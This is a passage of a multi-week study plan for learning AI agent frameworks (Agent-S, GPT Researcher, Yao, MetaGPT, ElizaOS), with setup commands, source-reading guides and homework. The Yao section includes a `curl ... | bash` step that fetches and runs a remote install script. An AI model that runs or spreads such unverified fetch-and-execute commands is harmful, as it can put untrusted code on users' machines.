[ ] `models.md` in the repo — supported model configurations + +**Identify core abstractions:** +- **Screenshot Capture** — the agent "sees" the screen as an image +- **Grounding Model** (UI-TARS) — converts screenshots to UI element locations +- **Planning Agent** — decides what to do based on current screen + goal +- **Execution Agent** — translates plans into mouse/keyboard actions +- **Behavior Best-of-N (bBoN)** — run multiple rollouts, pick the best + +**The pipeline:** +``` +Task → Screenshot → Grounding (UI-TARS: identify elements) → Planning (LLM: what to do) → Action (click/type/scroll) → New Screenshot → Loop +``` + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week3-architecture.md` + - Include the screenshot→grounding→planning→action pipeline + - Explain bBoN and why it matters (72.6% vs 66% on OSWorld) + - Compare: how is "seeing" a screen different from "calling" an API? + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week3-agent-s +python -m venv .venv && source .venv/bin/activate +pip install gui-agents +brew install tesseract # Required dependency +``` + +**API configuration:** +```bash +export OPENAI_API_KEY= +export ANTHROPIC_API_KEY= +export HF_TOKEN= +``` + +**Run Agent-S3 (if you have grounding model access):** +```bash +agent_s \ + --provider openai \ + --model gpt-4o \ + --ground_provider huggingface \ + --ground_url \ + --ground_model ui-tars-1.5-7b \ + --grounding_width 1920 \ + --grounding_height 1080 +``` + +> **If you can't run it:** Read through `gui_agents/s3/cli_app.py` line by line and trace the execution flow. Understand what WOULD happen at each step. + +- [ ] **📝 Homework:** Even if you can't run the full agent, build a minimal screenshot → analysis script: + ```python + # Take a screenshot, send it to a vision model, get a description of UI elements + # This exercises the same "visual grounding" concept, just simplified + ``` + - Save at `~/agent-study/week3-agent-s/hello_agent.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Understanding Computer Use + +**Work through:** +- [ ] Read `gui_agents/s3/agents/` — understand the multi-agent architecture +- [ ] Read `gui_agents/s3/core/` — how screenshots are captured and actions are executed +- [ ] Study the prompt templates in `gui_agents/s3/` — how the LLM is instructed +- [ ] Understand the bBoN strategy in `gui_agents/s3/bbon/` + +**Key concepts:** +- How screenshots are processed and annotated for the LLM +- How the grounding model converts visual elements to coordinates +- How actions (click, type, scroll) are executed on the OS level +- Cross-platform differences (Linux/Mac/Windows) +- The local coding environment feature + +- [ ] **📝 Homework:** Build something that uses the computer-use paradigm: + - **Option A (with GPU):** Give Agent-S a simple task (open a browser, search for something, copy a result) + - **Option B (without GPU):** Build a simplified "screen reader" agent that takes a screenshot, uses a vision model to understand the UI, and outputs a structured description of what's on screen + suggested next actions + - Save at `~/agent-study/week3-agent-s/computer_use_demo/` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `gui_agents/s3/cli_app.py` — Main entry point, execution loop +2. `gui_agents/s3/agents/` — Each agent role (planner, executor, grounding) +3. `gui_agents/s3/core/` — Screenshot capture, action execution, state management +4. `gui_agents/s3/bbon/` — Behavior Best-of-N implementation +5. `gui_agents/s1/` (briefly) — Compare S1 architecture to S3 to see evolution + +**Explore the papers' techniques:** +- [ ] How does "experience-augmented hierarchical planning" work? (S1) +- [ ] What's the "Mixture of Grounding" approach? (S2) +- [ ] How does S3 achieve simplicity while improving performance? + +- [ ] **📝 Homework:** Write "What I'd Steal from Agent-S" at `~/agent-study/notes/week3-steal.md` + - Focus on: The screenshot→grounding→action pipeline, bBoN strategy, cross-platform abstractions + - Think about: Could you add computer-use capabilities to a Pydantic-AI agent as a tool? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A "screen monitoring" agent that periodically screenshots your desktop, uses a vision model to understand what's happening, and logs structured summaries (using Pydantic-AI for the structured output!) + - **Alternative:** Build a browser automation agent using Playwright + vision model (a simplified version of Agent-S's approach) + - Save at `~/agent-study/week3-agent-s/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week3-retro.md` +- [ ] **Update comparison matrix** + +### 🎯 Key Questions: + +1. What is the screenshot → grounding → action pipeline and why is it powerful? +2. Why does Agent-S need a separate grounding model (UI-TARS) in addition to the planning LLM? +3. What is Behavior Best-of-N and how does it improve performance by ~6%? +4. How is computer-use fundamentally different from API-based agent frameworks? +5. What are the security implications of an agent that can control your mouse and keyboard? +6. What's the difference between Agent-S's approach and Anthropic's Computer Use or OpenAI's Operator? +7. When would you use computer-use agents vs. API-based agents? Give 3 examples of each. + +--- + +## Week 4: GPT Researcher + +> **Difficulty:** ⭐⭐ (Straightforward architecture, well-documented, familiar patterns) +> **Repo:** [github.com/assafelovic/gpt-researcher](https://github.com/assafelovic/gpt-researcher) +> **Stars:** 25k | **Language:** Python + +### Why This Is Week 4 + +After 3 weeks of studying *how* agents work internally, this week is about studying a *complete, purpose-built* agent that does one thing extremely well: research. GPT Researcher is the best example of the "Plan-and-Solve + RAG" pattern — a design you'll reuse in your own projects. + +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [docs.gptr.dev](https://docs.gptr.dev/docs/gpt-researcher/getting-started) | +| 💬 Discord | [Discord](https://discord.gg/QgZXvJAccX) | +| 📦 PyPI | [gpt-researcher](https://pypi.org/project/gpt-researcher/) | +| 📝 Blog: How it was built | [docs.gptr.dev/blog](https://docs.gptr.dev/blog/building-gpt-researcher) | +| 🎥 Demo | [YouTube](https://www.youtube.com/watch?v=f60rlc_QCxE) | +| 🔧 MCP Integration | [MCP Guide](https://docs.gptr.dev/docs/gpt-researcher/retrievers/mcp-configs) | +| 📜 Plan-and-Solve Paper | [arxiv.org/abs/2305.04091](https://arxiv.org/abs/2305.04091) | + +### 🗂 Source Code Guide + +``` +gpt_researcher/ +├── agent.py # ⭐ THE file. GPTResearcher class — the entire research orchestration +├── actions/ # ⭐ Research actions (generate questions, search, scrape, synthesize) +│ ├── query_processing.py # How research questions are generated from the user query +│ ├── web_search.py # Web search execution +│ └── report_generation.py # Final report synthesis +├── config/ # Configuration management +│ └── config.py # All configurable parameters +├── context/ # ⭐ Context management — how gathered info is stored/retrieved +│ └── compression.py # How context is compressed to fit token limits +├── document/ # Document processing (PDF, web pages, etc.) +├── memory/ # ⭐ Research memory — how the agent remembers what it's found +├── orchestrator/ # ⭐ Deep research — recursive tree exploration +│ └── agent/ # Sub-agents for deep research mode +├── retrievers/ # ⭐ Web/local search implementations (Tavily, DuckDuckGo, MCP, etc.) +└── scraper/ # Web scraping implementations +``` + +> **💡 Tip:** `agent.py` is the heart. It's one file, ~700 lines, and it contains the entire research orchestration. Read it top to bottom. Then read `actions/` to understand each step. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] Full [README](https://github.com/assafelovic/gpt-researcher) +- [ ] [How it was built](https://docs.gptr.dev/blog/building-gpt-researcher) — the design blog post +- [ ] [Getting Started](https://docs.gptr.dev/docs/gpt-researcher/getting-started) +- [ ] [Customization docs](https://docs.gptr.dev/docs/gpt-researcher/gptr/config) + +**Understand the Plan-and-Solve architecture:** +``` +User Query + → Planner Agent: Generate N research questions + → For each question: + → Crawler Agent: Search web, gather sources + → Summarizer: Extract relevant info from each source + → Source tracker: Track citations + → Publisher Agent: Aggregate all findings into a report +``` + +**Deep Research mode adds recursion:** +``` +User Query → Generate sub-topics → For each sub-topic → Generate deeper sub-topics → ... → Aggregate bottom-up +``` + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week4-architecture.md` + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week4-gpt-researcher +python -m venv .venv && source .venv/bin/activate +pip install gpt-researcher + +# Set required API keys +export OPENAI_API_KEY= +export TAVILY_API_KEY= +``` + +**Run the simplest version:** +```python +from gpt_researcher import GPTResearcher +import asyncio + +async def main(): + query = "What are the latest advancements in AI agent frameworks in 2025-2026?" + researcher = GPTResearcher(query=query) + research_result = await researcher.conduct_research() + report = await researcher.write_report() + print(report) + +asyncio.run(main()) +``` + +**Also try the web UI:** +```bash +git clone https://github.com/assafelovic/gpt-researcher.git +cd gpt-researcher +pip install -r requirements.txt +python -m uvicorn main:app --reload +# Visit http://localhost:8000 +``` + +- [ ] **📝 Homework:** Build a minimal research agent from scratch — NO copy-paste + - Save at `~/agent-study/week4-gpt-researcher/hello_researcher.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Deep Research + MCP + +**Focus: GPT Researcher's key differentiators — Deep Research mode and MCP integration** + +**Work through:** +- [ ] [Deep Research docs](https://docs.gptr.dev/docs/gpt-researcher/gptr/deep-research) +- [ ] [MCP Integration Guide](https://docs.gptr.dev/docs/gpt-researcher/retrievers/mcp-configs) +- [ ] [Local document research](https://docs.gptr.dev/docs/gpt-researcher/gptr/local-docs) +- [ ] Run a Deep Research query and observe the recursive tree exploration + +**Key concepts:** +- How Deep Research recursively explores sub-topics +- How MCP connects GPT Researcher to external data sources +- How context compression prevents token limit issues +- How source tracking and citations work +- The difference between web research and local document research + +- [ ] **📝 Homework:** Build a research agent that uses GPT Researcher's unique capabilities: + - **Must include:** MCP integration with at least one external source (e.g., GitHub MCP server) + - **OR:** Research over local documents (PDFs, markdown files from your study notes) + - **Bonus:** Use Deep Research mode for a complex topic + - Save at `~/agent-study/week4-gpt-researcher/deep_research_demo.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `gpt_researcher/agent.py` — The entire GPTResearcher class, top to bottom +2. `gpt_researcher/actions/query_processing.py` — How research questions are generated +3. `gpt_researcher/context/compression.py` — How context is managed within token limits +4. `gpt_researcher/orchestrator/` — Deep research recursive tree implementation +5. `gpt_researcher/retrievers/` — How different search providers are integrated + +**Understand:** +- [ ] How the planner decomposes a query into research questions +- [ ] How the agent handles rate limiting and API failures +- [ ] How context compression works (this is critical for long research) +- [ ] How the orchestrator manages the recursive tree in Deep Research mode +- [ ] How the report generator synthesizes multiple sources into a coherent report + +- [ ] **📝 Homework:** Write "What I'd Steal from GPT Researcher" at `~/agent-study/notes/week4-steal.md` + - Focus on: Plan-and-Solve decomposition, context compression, source tracking, recursive exploration + - Compare: how would you build "deep research" capability into a Pydantic-AI agent? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A "competitive analysis" agent — given a company/product, it researches competitors, pricing, features, and generates a structured comparison report. Use GPT Researcher's engine + Pydantic-AI for structured output. + - **Alternative:** Install GPT Researcher as a [Claude Skill](https://skills.sh/assafelovic/gpt-researcher/gpt-researcher) and use it in your Claude workflow + - Save at `~/agent-study/week4-gpt-researcher/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week4-retro.md` +- [ ] **Update comparison matrix** + +### 🎯 Key Questions: + +1. What is the Plan-and-Solve pattern and how does GPT Researcher implement it? +2. How does Deep Research differ from regular research? Draw the tree structure. +3. How does context compression prevent token limit issues during long research? +4. How does GPT Researcher track and cite sources? +5. What search providers does GPT Researcher support and how do you add a new one? +6. How could you combine GPT Researcher with Pydantic-AI for structured research outputs? +7. What are the limitations of automated research (hallucination, bias, recency)? + +--- + +## Week 5: Yao + +> **Difficulty:** ⭐⭐⭐⭐ (Go language, novel architecture, less documentation, paradigm shift) +> **Repo:** [github.com/YaoApp/yao](https://github.com/YaoApp/yao) +> **Stars:** 7.5k | **Language:** Go | **Runtime:** Single binary with V8 engine + +### Why This Is Week 5 + +Yao is the most architecturally unique repo in the entire study. It's not a chatbot framework — it's an **autonomous agent engine** where agents are triggered by events, schedules, and emails. This is the only Go-based framework, the only one with event-driven architecture, and the only one that deploys as a single binary. If everything else is "AI assistant," Yao is "AI team member." + +> **⚠️ Language Note:** This week requires Go. If you don't know Go, spend an extra hour on Day 1 doing the [Go Tour](https://go.dev/tour/). You don't need to be fluent — just enough to read the source code. + +### Resources + +| Resource | Link | +|----------|------| +| 🏠 Homepage | [yaoapps.com](https://yaoapps.com) | +| 📖 Documentation | [yaoapps.com/docs](https://yaoapps.com/docs) | +| 🚀 Quick Start | [Getting Started](https://yaoapps.com/docs/documentation/en-us/getting-started) | +| ✨ Why Yao? | [Why Yao](https://yaoapps.com/docs/documentation/en-us/getting-started/why-yao) | +| 🤖 Agent Examples | [YaoAgents/awesome](https://github.com/YaoAgents/awesome) | +| 📦 Install Script | `curl -fsSL https://yaoapps.com/install.sh \| bash` | +| 🐹 Go Tour (if needed) | [go.dev/tour](https://go.dev/tour/) | + +### 🗂 Source Code Guide + +``` +yao/ +├── engine/ +│ └── process.go # ⭐ Process engine — core concept in Yao +├── agent/ # ⭐ Agent framework — autonomous agent definitions +│ ├── agent.go # Agent lifecycle, trigger modes, execution phases +│ └── triggers/ # Clock, Human, Event trigger implementations +├── runtime/ +│ └── v8/ # ⭐ Built-in V8 JavaScript/TypeScript engine +├── rag/ +│ └── graph/ # ⭐ Built-in GraphRAG implementation +├── mcp/ # MCP integration +├── api/ # HTTP server and REST API +├── model/ # ORM and database layer +└── cmd/ + └── yao/ + └── main.go # Application entry point +``` + +> **💡 Tip:** Yao's DSL-based approach means you'll be reading `.yao` files (YAML-like definitions) as much as Go source code. The mental model is: you define agents as data (DSL), and the engine executes them. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] Full [README](https://github.com/YaoApp/yao) +- [ ] [Why Yao?](https://yaoapps.com/docs/documentation/en-us/getting-started/why-yao) +- [ ] [Documentation overview](https://yaoapps.com/docs) +- [ ] Skim the Go source: `cmd/yao/main.go` → `engine/process.go` → `agent/agent.go` + +**Understand Yao's radical differences:** + +| Traditional Agent | Yao Agent | +|-------------------|-----------| +| Entry point: chatbox | Entry point: email, events, schedules | +| Passive: you ask, it answers | Proactive: it works autonomously | +| Role: tool | Role: team member | + +**The six-phase execution model:** +``` +Inspiration → Goals → Tasks → Run → Deliver → Learn +``` + +**Three trigger modes:** +1. **Clock** — scheduled tasks (cron-like) +2. **Human** — triggered by email or messages +3. **Event** — triggered by webhooks or database changes + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week5-architecture.md` + - Focus on: How the event-driven model is fundamentally different from request-response + - Compare: 6-phase execution vs Pydantic-AI's run loop vs MS Agent Framework's graph + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +# Install Yao (single binary!) +curl -fsSL https://yaoapps.com/install.sh | bash + +# Create a project +cd ~/agent-study/week5-yao +mkdir project && cd project +yao start # First run creates project structure +# Visit http://127.0.0.1:5099 +``` + +**Run your first process:** +```bash +yao run utils.app.Ping # Returns version +yao run scripts.tests.Hello 'Hello, Yao!' # Run TypeScript +yao run models.tests.pet.Find 1 '::{}' # Query database +``` + +**Understand core concepts:** +- [ ] **Processes** — functions that can be run directly or referenced in code +- [ ] **Models** — database models defined in `.mod.yao` files +- [ ] **Scripts** — TypeScript/JavaScript code executed by the built-in V8 engine +- [ ] **DSL** — Yao's declarative syntax for defining everything + +- [ ] **📝 Homework:** Build the simplest Yao application from scratch: + - Define a model, write a process, create a simple API endpoint + - Save project at `~/agent-study/week5-yao/hello_project/` + +--- + +### Day 3 (Wednesday): Intermediate Build — Event-Driven Agents + +**Focus: What makes Yao unique — event-driven, proactive agents** + +**Work through:** +- [ ] Agent configuration — defining agents with roles and triggers +- [ ] Setting up a scheduled (Clock) trigger +- [ ] Setting up an Event trigger (webhook → agent action) +- [ ] MCP integration — connecting external tools +- [ ] GraphRAG — how the built-in knowledge graph works + +**Key concepts:** +- How agents are defined declaratively (vs. programmatically in Python frameworks) +- How the three trigger modes work in practice +- How agents learn from past executions (the "Learn" phase) +- How GraphRAG combines vector search with graph traversal +- Why a single binary matters for deployment + +- [ ] **📝 Homework:** Build an event-driven agent: + - **Must include:** At least 2 different trigger modes (e.g., Clock + Event) + - **Must include:** An agent that does something proactively (not just responding to a chat) + - Example idea: An agent that checks an RSS feed on a schedule (Clock), processes new articles (Run), and stores summaries in the knowledge base (Learn/Deliver) + - Save at `~/agent-study/week5-yao/event_agent/` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `cmd/yao/main.go` — Application entry point, how the single binary initializes +2. `engine/process.go` — The process engine (core execution abstraction) +3. `agent/agent.go` — Agent lifecycle and execution phases +4. `runtime/v8/` — How the V8 engine is embedded for TypeScript support +5. `rag/graph/` — GraphRAG implementation (vector + graph hybrid search) + +**Understand:** +- [ ] How Go's concurrency model (goroutines) enables event-driven agents +- [ ] How the V8 engine is embedded and used for TypeScript execution +- [ ] How GraphRAG combines embedding search with entity-relationship traversal +- [ ] How a single Go binary includes all these features without external dependencies + +- [ ] **📝 Homework:** Write "What I'd Steal from Yao" at `~/agent-study/notes/week5-steal.md` + - Focus on: Event-driven architecture, single binary deployment, GraphRAG, DSL approach + - Think about: Could you add event-driven capabilities to a Python agent framework? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A "daily briefing" agent — schedule it to run every morning, have it gather data from APIs (weather, calendar, news), process it, and output a structured briefing. Use the Clock trigger + MCP for external data. + - **Alternative:** Build a webhook-triggered agent that processes incoming data and stores it in GraphRAG + - Save at `~/agent-study/week5-yao/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week5-retro.md` +- [ ] **Update comparison matrix** + +### 🎯 Key Questions: + +1. How does Yao's event-driven model differ from the request-response model of every other framework? +2. What are the three trigger modes and when would you use each? +3. What is the six-phase execution model and how does the "Learn" phase create a feedback loop? +4. Why is single-binary deployment a significant advantage? Where would you deploy Yao that you couldn't deploy Python frameworks? +5. How does Yao's built-in GraphRAG differ from vector-only RAG? +6. What does it mean that Yao embeds a V8 engine? What are the implications for extensibility? +7. What types of applications is Yao best suited for vs. worst suited for? + +--- + +## Week 6: MetaGPT + +> **Difficulty:** ⭐⭐⭐ (Large codebase, academic concepts, multi-agent complexity) +> **Repo:** [github.com/FoundationAgents/MetaGPT](https://github.com/FoundationAgents/MetaGPT) +> **Stars:** 63k | **Language:** Python | **Papers:** ICLR 2024 + many more + +### Why This Is Week 6 + +MetaGPT is the OG multi-agent framework and the capstone of your study. It introduces Standard Operating Procedures (SOPs) as the coordination mechanism — a genuinely novel idea that maps human organizational structures onto AI agents. By Week 6, you have enough context from the previous 5 frameworks to deeply appreciate what MetaGPT does differently. + +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [docs.deepwisdom.ai](https://docs.deepwisdom.ai/main/en/) | +| 💬 Discord | [Discord](https://discord.gg/ZRHeExS6xv) | +| 📦 PyPI | [metagpt](https://pypi.org/project/metagpt/) | +| 🎯 MGX (commercial product) | [mgx.dev](https://mgx.dev/) | +| 📄 MetaGPT Paper (ICLR 2024) | [openreview.net](https://openreview.net/forum?id=VtmBAGCN7o) | +| 📄 AFlow Paper (ICLR 2025 Oral) | [openreview.net](https://openreview.net/forum?id=z5uVAKwmjf) | +| 📝 Agent 101 Tutorial | [Agent 101](https://docs.deepwisdom.ai/main/en/guide/tutorials/agent_101.html) | +| 📝 MultiAgent 101 | [MultiAgent 101](https://docs.deepwisdom.ai/main/en/guide/tutorials/multi_agent_101.html) | +| 🤗 HuggingFace Demo | [MetaGPT Space](https://huggingface.co/spaces/deepwisdom/MetaGPT-SoftwareCompany) | + +### 🗂 Source Code Guide + +``` +metagpt/ +├── roles/ # ⭐ Role definitions — each role = one agent with a job +│ ├── role.py # ⭐ Base Role class — THE core abstraction +│ ├── architect.py # Software architect agent +│ ├── engineer.py # Software engineer agent +│ ├── product_manager.py # Product manager agent +│ ├── project_manager.py # Project manager agent +│ └── di/ +│ └── data_interpreter.py # Data analysis agent +├── actions/ # ⭐ Action definitions — what roles can do +│ ├── action.py # Base Action class +│ ├── write_prd.py # Write Product Requirements Document +│ ├── write_design.py # Write system design +│ └── write_code.py # Write code +├── team.py # ⭐ Team orchestration — how roles collaborate via SOPs +├── environment.py # ⭐ Shared environment — message passing between roles +├── schema.py # Message schemas for inter-role communication +├── config2.py # Configuration management +├── base/ # Base classes and utilities +├── memory/ # Memory management for roles +├── software_company.py # ⭐ The "software company" end-to-end pipeline +└── utils/ + └── project_repo.py # Project repository management +``` + +> **💡 Tip:** The mental model is: **Role** (who) performs **Actions** (what) according to **SOPs** (how). Read `roles/role.py` first, then `actions/action.py`, then `team.py`. That's the holy trinity of MetaGPT. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] Full [README](https://github.com/FoundationAgents/MetaGPT) +- [ ] [Agent 101 Tutorial](https://docs.deepwisdom.ai/main/en/guide/tutorials/agent_101.html) +- [ ] [MultiAgent 101 Tutorial](https://docs.deepwisdom.ai/main/en/guide/tutorials/multi_agent_101.html) +- [ ] MetaGPT paper (abstract + Sections 1-3) — the SOP concept +- [ ] Skim the [AFlow paper](https://openreview.net/forum?id=z5uVAKwmjf) abstract — automated workflow generation + +**Core philosophy:** `Code = SOP(Team)` + +**Identify core abstractions:** +- **Role** — an agent with a specific job (PM, architect, engineer, etc.) +- **Action** — a discrete task a role can perform (write PRD, write code, etc.) +- **SOP** — Standard Operating Procedures that define the workflow between roles +- **Team** — the orchestrator that manages roles and message passing +- **Environment** — shared context where roles publish and subscribe to messages +- **Message** — typed communication between roles + +**The "software company" pipeline:** +``` +User Requirement + → Product Manager (writes PRD) + → Architect (writes system design) + → Project Manager (creates task breakdown) + → Engineer (writes code) + → QA (tests code) +``` + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week6-architecture.md` + - Explain the SOP model and how it maps to human organizations + - Compare: SOP coordination vs Graph workflows (MS) vs Event-driven (Yao) vs Linear (Pydantic-AI) + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week6-metagpt +conda create -n metagpt python=3.11 && conda activate metagpt +pip install --upgrade metagpt +metagpt --init-config # Creates ~/.metagpt/config2.yaml +# Edit the config to add your API key +``` + +**Run the classic demo:** +```bash +metagpt "Create a snake game" # This will generate a full project in ./workspace +``` + +**Also try programmatically:** +```python +from metagpt.software_company import generate_repo +from metagpt.utils.project_repo import ProjectRepo + +repo: ProjectRepo = generate_repo("Create a simple calculator app") +print(repo) +``` + +**And try the Data Interpreter:** +```python +import asyncio +from metagpt.roles.di.data_interpreter import DataInterpreter + +async def main(): + di = DataInterpreter() + await di.run("Run data analysis on sklearn Iris dataset, include a plot") + +asyncio.run(main()) +``` + +- [ ] **📝 Homework:** Build a custom role from scratch — NO copy-paste: + - Define a new `Role` subclass with custom `Action`s + - Example: a "ResearchAnalyst" role that takes a topic and produces a structured analysis + - Save at `~/agent-study/week6-metagpt/hello_role.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Multi-Agent SOPs + +**Focus: MetaGPT's unique capability — SOP-based multi-agent coordination** + +**Work through:** +- [ ] [MultiAgent 101](https://docs.deepwisdom.ai/main/en/guide/tutorials/multi_agent_101.html) +- [ ] Look at the [Debate example](https://docs.deepwisdom.ai/main/en/guide/use_cases/multi_agent/debate.html) +- [ ] Understand how messages flow between roles via the Environment +- [ ] Understand how the SOP defines which role acts after which + +**Key concepts:** +- How roles subscribe to message types from other roles +- How the Team orchestrator manages turn-taking +- How the Environment enables publish/subscribe communication +- How SOPs encode workflow logic without explicit graph definitions +- The difference between the "software company" SOP and custom SOPs + +- [ ] **📝 Homework:** Build a multi-agent system with a custom SOP: + - **Must include:** At least 3 custom roles with different responsibilities + - **Must include:** Custom message types between roles + - **Must include:** A clear SOP workflow (Role A → Role B → Role C) + - Example idea: A "content creation team" — Researcher (gathers info) → Writer (drafts article) → Editor (reviews and improves) → Publisher (formats final output) + - Save at `~/agent-study/week6-metagpt/multi_agent_sop.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `metagpt/roles/role.py` — Base Role class, how roles think and act +2. `metagpt/actions/action.py` — Base Action class, how actions execute +3. `metagpt/team.py` — Team orchestration, turn management +4. `metagpt/environment.py` — Message passing, pub/sub system +5. `metagpt/schema.py` — Message types and schemas + +**Also explore:** +- [ ] `metagpt/roles/engineer.py` — how the Engineer role writes code (complex action chain) +- [ ] `metagpt/software_company.py` — the end-to-end pipeline +- [ ] `metagpt/memory/` — how roles maintain memory across turns +- [ ] `examples/` — AFlow and SPO implementations + +**Advanced concepts:** +- [ ] How does AFlow (Automated Agentic Workflow Generation) work? +- [ ] What is SPO (Self-Play Optimization)? +- [ ] How does the Data Interpreter differ from the Software Company pipeline? + +- [ ] **📝 Homework:** Write "What I'd Steal from MetaGPT" at `~/agent-study/notes/week6-steal.md` + - Focus on: SOP-based coordination, Role/Action abstraction, message-passing environment + - Reflect on: Which coordination model do you prefer? Graph (MS) vs SOP (MetaGPT) vs Event (Yao)? + +--- + +### Day 5 (Friday): Integration Project + Final Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A multi-agent system that takes a business idea and produces a full analysis: Market Researcher role → Business Analyst role → Financial Modeler role → Report Writer role. Each produces a structured output that feeds into the next. + - Save at `~/agent-study/week6-metagpt/integration_project/` + +- [ ] **Write final retrospective** at `~/agent-study/notes/week6-retro.md` + - This one should be more comprehensive — reflect on ALL 6 weeks + - What framework would you reach for first? When? + - What surprised you most across the study? + +- [ ] **Complete comparison matrix** — all 6 frameworks +- [ ] **Commit and push everything** to your study git repo + +### 🎯 Key Questions: + +1. What does "Code = SOP(Team)" mean concretely? +2. How does the Role/Action/SOP model map to real organizational structures? +3. How do messages flow between roles? What's the pub/sub mechanism? +4. What's the difference between MetaGPT's approach and MS Agent Framework's graph workflows? +5. How does the Data Interpreter feature differ from the Software Company pipeline? +6. What is AFlow and why was it accepted as an oral presentation at ICLR 2025? +7. When would you use MetaGPT vs simpler single-agent frameworks? +8. Across all 6 frameworks, which coordination model (linear/graph/SOP/event) do you think is most general? + +--- + +## Week 7: ElizaOS + +> **Timeline:** 1 week | **Difficulty:** ⭐⭐ | **Goal:** Learn agent deployment & multi-platform distribution +> **Repo:** [elizaOS/eliza](https://github.com/elizaOS/eliza) | ⭐ 17,476 | TypeScript +> **Why this week:** Weeks 1-6 taught you how to BUILD agents. This week teaches you how to DEPLOY them where users actually are. + +### Why ElizaOS Makes The Cut + +After a thorough debate (see the [deep dive analysis](./trending-repos-deep-dive.md)), ElizaOS earned its spot because: +- It's the **only deployment-focused platform** on the trending list — multi-platform routing (Discord, Telegram, Twitter, Farcaster) in one framework +- **17k stars** with active development and a large community +- The plugin architecture, character system, and platform adapters teach **real deployment patterns** you won't learn from any other framework studied +- Knowing how to ship agents to where users live is as important as knowing how to build them + +### Resources + +| Resource | URL | +|----------|-----| +| **GitHub** | https://github.com/elizaOS/eliza | +| **Docs** | https://elizaos.github.io/eliza/ | +| **Discord** | https://discord.gg/elizaos | +| **Quickstart** | https://elizaos.github.io/eliza/docs/quickstart | + +### Key Source Files to Read + +| File | Why It Matters | +|------|---------------| +| `packages/core/src/runtime.ts` | The AgentRuntime — the central brain that coordinates everything | +| `packages/core/src/types.ts` | All the core interfaces (Character, Memory, Action, Provider, Evaluator) | +| `packages/plugin-discord/src/index.ts` | How a platform adapter is built — the Discord integration | +| `packages/plugin-telegram/src/index.ts` | Compare with Discord adapter — spot the platform abstraction pattern | +| `packages/core/src/memory.ts` | Memory management — how agents maintain context across platforms | +| `agent/src/index.ts` | The entry point — how everything gets wired together | + +--- + +### Day 1 (Monday): Architecture Deep Dive — The Deployment Platform + +**Study (1-2 hrs):** +- Read the full README and quickstart docs +- Understand the core architecture: + - **Character files** — how agent personalities are defined (JSON-based) + - **AgentRuntime** — the central coordinator + - **Plugins** — how platform adapters, actions, and providers are registered + - **Actions vs Evaluators vs Providers** — the three extension points + - **Memory** — how conversation state persists across platforms +- Study the plugin system architecture — how does one agent connect to Discord AND Telegram simultaneously? +- Understand the character file format — what can you configure? + +**Key Questions:** +- How does ElizaOS route a message from Discord to the right agent and back? +- What's the difference between an Action, an Evaluator, and a Provider? +- How does the memory system work across platforms? Can an agent remember a Discord convo when talking on Telegram? +- How does the character file influence agent behavior vs hard-coded logic? + +**Homework:** +- [ ] Write a 1-page architecture summary covering: runtime → plugins → adapters → memory → character system +- [ ] Draw a diagram showing message flow: User sends Discord message → ... → Agent responds +- [ ] Compare the architecture to Pydantic-AI's approach — what's different about a "deployment-first" vs "logic-first" framework? + +--- + +### Day 2 (Tuesday): Hello World — Deploy an Agent to Discord + +**Study (1-2 hrs):** +- Set up the ElizaOS development environment + - Clone the repo, install deps (`pnpm install`) + - Create a Discord bot in the Discord Developer Portal (you'll need a test server) + - Set up your `.env` with Discord bot token and an LLM API key +- Create a custom character file for your agent: + - Define name, bio, personality traits, example conversations + - Set the model provider and platform connections +- Run the agent locally, verify it responds in Discord + +**Homework:** +- [ ] Create a character file from scratch (no copy-paste from examples) — give it a distinct personality +- [ ] Deploy the agent to your Discord test server and have a 10-message conversation with it +- [ ] Screenshot the conversation and note: What worked? What felt off? How does character configuration affect responses? + +--- + +### Day 3 (Wednesday): Multi-Platform + Plugin System + +**Study (1-2 hrs):** +- Add a second platform — connect the same agent to Telegram (or Twitter) + - Same character, same agent, two platforms simultaneously + - Observe: does memory carry across? How does the agent handle platform-specific features? +- Study the plugin architecture: + - Read how `plugin-discord` and `plugin-telegram` are structured + - Understand the `Plugin` interface — what does a plugin provide? + - Look at how Actions work — these are the agent's "tools" +- Write a custom Action plugin: + - Something simple: a weather lookup, a file reader, or a joke generator + - Register it and verify your agent can use it on both platforms + +**Homework:** +- [ ] Run your agent on 2 platforms simultaneously — screenshot both conversations +- [ ] Build a custom Action plugin from scratch and verify it works +- [ ] Write a comparison: how does ElizaOS's plugin system compare to Pydantic-AI's tool system and MetaGPT's action system? What are the trade-offs? + +--- + +### Day 4 (Thursday): Source Code Reading + Advanced Patterns + +**Study (1-2 hrs):** +- Read the key source files from the table above, focusing on: + - 